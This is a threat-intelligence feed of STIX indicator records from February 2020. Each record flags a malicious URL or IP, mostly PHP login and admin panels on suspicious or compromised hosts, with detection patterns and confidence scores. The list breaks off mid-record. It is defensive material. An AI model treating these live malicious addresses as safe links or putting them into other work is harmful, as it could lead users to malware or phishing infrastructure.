+{"created":"2020-02-23T02:53:27.735Z","description":"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--ff626727-4888-4cba-9257-470f0a70891a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:27.735Z","name":"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:27.735Z"} +{"created":"2020-02-23T02:53:40.401Z","description":"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:40.401Z","name":"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.401Z"} +{"created":"2020-02-23T02:53:40.432Z","description":"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9d14574f-9af7-493d-84a2-f631570f1940","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:53:40.432Z","name":"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:40.432Z"} +{"created":"2020-02-23T02:53:40.453Z","description":"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:53:40.453Z","name":"mal_url: http://mactreher.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mactreher.ru/login']","type":"indicator","valid_from":"2020-02-23T02:53:40.453Z"} +{"created":"2020-02-23T02:53:42.405Z","description":"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:42.405Z","name":"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:42.405Z"} +{"created":"2020-02-23T02:53:42.443Z","description":"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:42.443Z","name":"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:42.443Z"} +{"created":"2020-02-23T02:53:47.65Z","description":"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-23T02:53:47.65Z","name":"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:47.65Z"} +{"created":"2020-02-23T02:53:53.437Z","description":"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:53:53.437Z","name":"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:53:53.437Z"} +{"created":"2020-02-23T02:54:02.069Z","description":"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6d4b1407-6885-4030-beae-43747e458b8a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:02.069Z","name":"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:02.069Z"} +{"created":"2020-02-23T02:54:09.172Z","description":"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:09.172Z","name":"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:09.172Z"} +{"created":"2020-02-23T02:54:15.807Z","description":"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--27b834b0-4113-4eca-8989-d7ada85d0779","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:15.807Z","name":"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:15.807Z"} +{"created":"2020-02-23T02:54:17.76Z","description":"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56334c71-2f84-4e09-a6cc-017577b99970","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:17.76Z","name":"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:17.76Z"} +{"created":"2020-02-23T02:54:19.374Z","description":"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-54"],"modified":"2020-02-23T02:54:19.374Z","name":"mal_ip: 162.144.13.146","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.13.146']","type":"indicator","valid_from":"2020-02-23T02:54:19.374Z"} +{"created":"2020-02-23T02:54:25.477Z","description":"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--8b4fe873-9b07-4985-9818-291623fc07b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-23T02:54:25.477Z","name":"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:25.477Z"} +{"created":"2020-02-23T02:54:39.696Z","description":"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-23T02:54:39.696Z","name":"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.696Z"} +{"created":"2020-02-23T02:54:39.976Z","description":"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0748270e-f010-4598-a389-553d3fffcb48","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:39.976Z","name":"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:39.976Z"} +{"created":"2020-02-23T02:54:40.035Z","description":"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-23T02:54:40.035Z","name":"mal_ip: 202.67.10.173","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '202.67.10.173']","type":"indicator","valid_from":"2020-02-23T02:54:40.035Z"} +{"created":"2020-02-23T02:54:40.281Z","description":"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:54:40.281Z","name":"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:40.281Z"} +{"created":"2020-02-23T02:54:48.232Z","description":"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-59"],"modified":"2020-02-23T02:54:48.232Z","name":"mal_ip: 50.116.87.108","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '50.116.87.108']","type":"indicator","valid_from":"2020-02-23T02:54:48.232Z"} +{"created":"2020-02-23T02:54:53.263Z","description":"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-23T02:54:53.263Z","name":"mal_url: http://193.142.59.96/africa/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.96/africa/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:54:53.263Z"} +{"created":"2020-02-23T02:54:54.071Z","description":"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:54:54.071Z","name":"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:54:54.071Z"} +{"created":"2020-02-23T02:55:00.871Z","description":"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:55:00.871Z","name":"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.871Z"} +{"created":"2020-02-23T02:55:00.907Z","description":"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:00.907Z","name":"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.907Z"} +{"created":"2020-02-23T02:55:00.94Z","description":"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-23T02:55:00.94Z","name":"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-23T02:55:00.94Z"} +{"created":"2020-02-23T02:55:03.894Z","description":"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:55:03.894Z","name":"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:03.894Z"} +{"created":"2020-02-23T02:55:15.714Z","description":"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:55:15.714Z","name":"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:55:15.714Z"} +{"created":"2020-02-24T02:54:25.932Z","description":"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-24T02:54:25.932Z","name":"mal_url: http://saind.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://saind.myjino.ru/login']","type":"indicator","valid_from":"2020-02-24T02:54:25.932Z"} +{"created":"2020-02-25T02:52:18.371Z","description":"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--c19c0ccc-9df8-4804-83da-1c469d220574","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:18.371Z","name":"mal_url: http://farsson.com/~zadmin/7/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/7/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:18.371Z"} +{"created":"2020-02-25T02:52:27.703Z","description":"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:27.703Z","name":"mal_url: http://farsson.com/~zadmin/14/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/14/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.703Z"} +{"created":"2020-02-25T02:52:27.729Z","description":"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--952cf095-32f4-4b10-8680-499ccd9f784f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:27.729Z","name":"mal_url: http://pabloemino.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pabloemino.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:27.729Z"} +{"created":"2020-02-25T02:52:27.765Z","description":"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime","id":"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-43"],"modified":"2020-02-25T02:52:27.765Z","name":"mal_url: http://37.72.168.165/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://37.72.168.165/login']","type":"indicator","valid_from":"2020-02-25T02:52:27.765Z"} +{"created":"2020-02-25T02:52:27.808Z","description":"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime","id":"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:27.808Z","name":"mal_ip: 185.154.52.251","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.154.52.251']","type":"indicator","valid_from":"2020-02-25T02:52:27.808Z"} +{"created":"2020-02-25T02:52:37.329Z","description":"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime","id":"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-02-25T02:52:37.329Z","name":"mal_ip: 194.87.146.180","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '194.87.146.180']","type":"indicator","valid_from":"2020-02-25T02:52:37.329Z"} +{"created":"2020-02-25T02:52:38.025Z","description":"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-39"],"modified":"2020-02-25T02:52:38.025Z","name":"mal_ip: 81.177.135.161","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.177.135.161']","type":"indicator","valid_from":"2020-02-25T02:52:38.025Z"} +{"created":"2020-02-25T02:52:38.053Z","description":"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--c36b85d9-df19-439b-8605-d7c4b0653977","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-25T02:52:38.053Z","name":"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.053Z"} +{"created":"2020-02-25T02:52:38.531Z","description":"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-25T02:52:38.531Z","name":"mal_url: http://jusqit.com/2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jusqit.com/2/panel/admin.php']","type":"indicator","valid_from":"2020-02-25T02:52:38.531Z"} +{"created":"2020-02-25T02:52:38.564Z","description":"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime","id":"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-25T02:52:38.564Z","name":"mal_url: http://webupdateadobe.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://webupdateadobe.com/login']","type":"indicator","valid_from":"2020-02-25T02:52:38.564Z"} +{"created":"2020-02-25T02:52:40.276Z","description":"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2c31e18b-164e-42bc-afd8-04815a33e043","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.276Z","name":"mal_url: http://gsddfsfasa.pw/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gsddfsfasa.pw/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.276Z"} +{"created":"2020-02-25T02:52:40.317Z","description":"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-25T02:52:40.317Z","name":"mal_ip: 45.143.92.129","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.92.129']","type":"indicator","valid_from":"2020-02-25T02:52:40.317Z"} +{"created":"2020-02-25T02:52:40.344Z","description":"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--387937df-4030-4cfe-91b7-bd9795985adc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:40.344Z","name":"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:40.344Z"} +{"created":"2020-02-25T02:52:41.781Z","description":"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-25T02:52:41.781Z","name":"mal_ip: 185.98.87.192","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.98.87.192']","type":"indicator","valid_from":"2020-02-25T02:52:41.781Z"} +{"created":"2020-02-25T02:52:52.59Z","description":"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime","id":"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-25T02:52:52.59Z","name":"mal_url: http://farsson.com/~zadmin/10/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farsson.com/~zadmin/10/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.59Z"} +{"created":"2020-02-25T02:52:52.623Z","description":"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--04bc5b54-46ae-44d7-96a6-863481383436","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:52:52.623Z","name":"mal_url: http://anypontop.com/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anypontop.com/login.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.623Z"} +{"created":"2020-02-25T02:52:52.674Z","description":"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--65a5607b-388a-4789-98d0-84d77ee94047","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-25T02:52:52.674Z","name":"mal_ip: 176.119.158.219","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.119.158.219']","type":"indicator","valid_from":"2020-02-25T02:52:52.674Z"} +{"created":"2020-02-25T02:52:52.712Z","description":"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime","id":"indicator--b70344da-8137-4550-b569-97f0e3020ab1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-25T02:52:52.712Z","name":"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:52:52.712Z"} +{"created":"2020-02-25T02:52:55.912Z","description":"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime","id":"indicator--3ff92876-fac4-49a6-ae80-d123206dc224","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-25T02:52:55.912Z","name":"mal_ip: 195.54.33.150","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '195.54.33.150']","type":"indicator","valid_from":"2020-02-25T02:52:55.912Z"} +{"created":"2020-02-25T02:53:04.191Z","description":"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-25T02:53:04.191Z","name":"mal_url: http://belt-yard-74.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://belt-yard-74.myjino.ru/login']","type":"indicator","valid_from":"2020-02-25T02:53:04.191Z"} +{"created":"2020-02-25T02:53:12.657Z","description":"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime","id":"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-25T02:53:12.657Z","name":"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-25T02:53:12.657Z"} +{"created":"2020-02-25T02:53:15.804Z","description":"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: 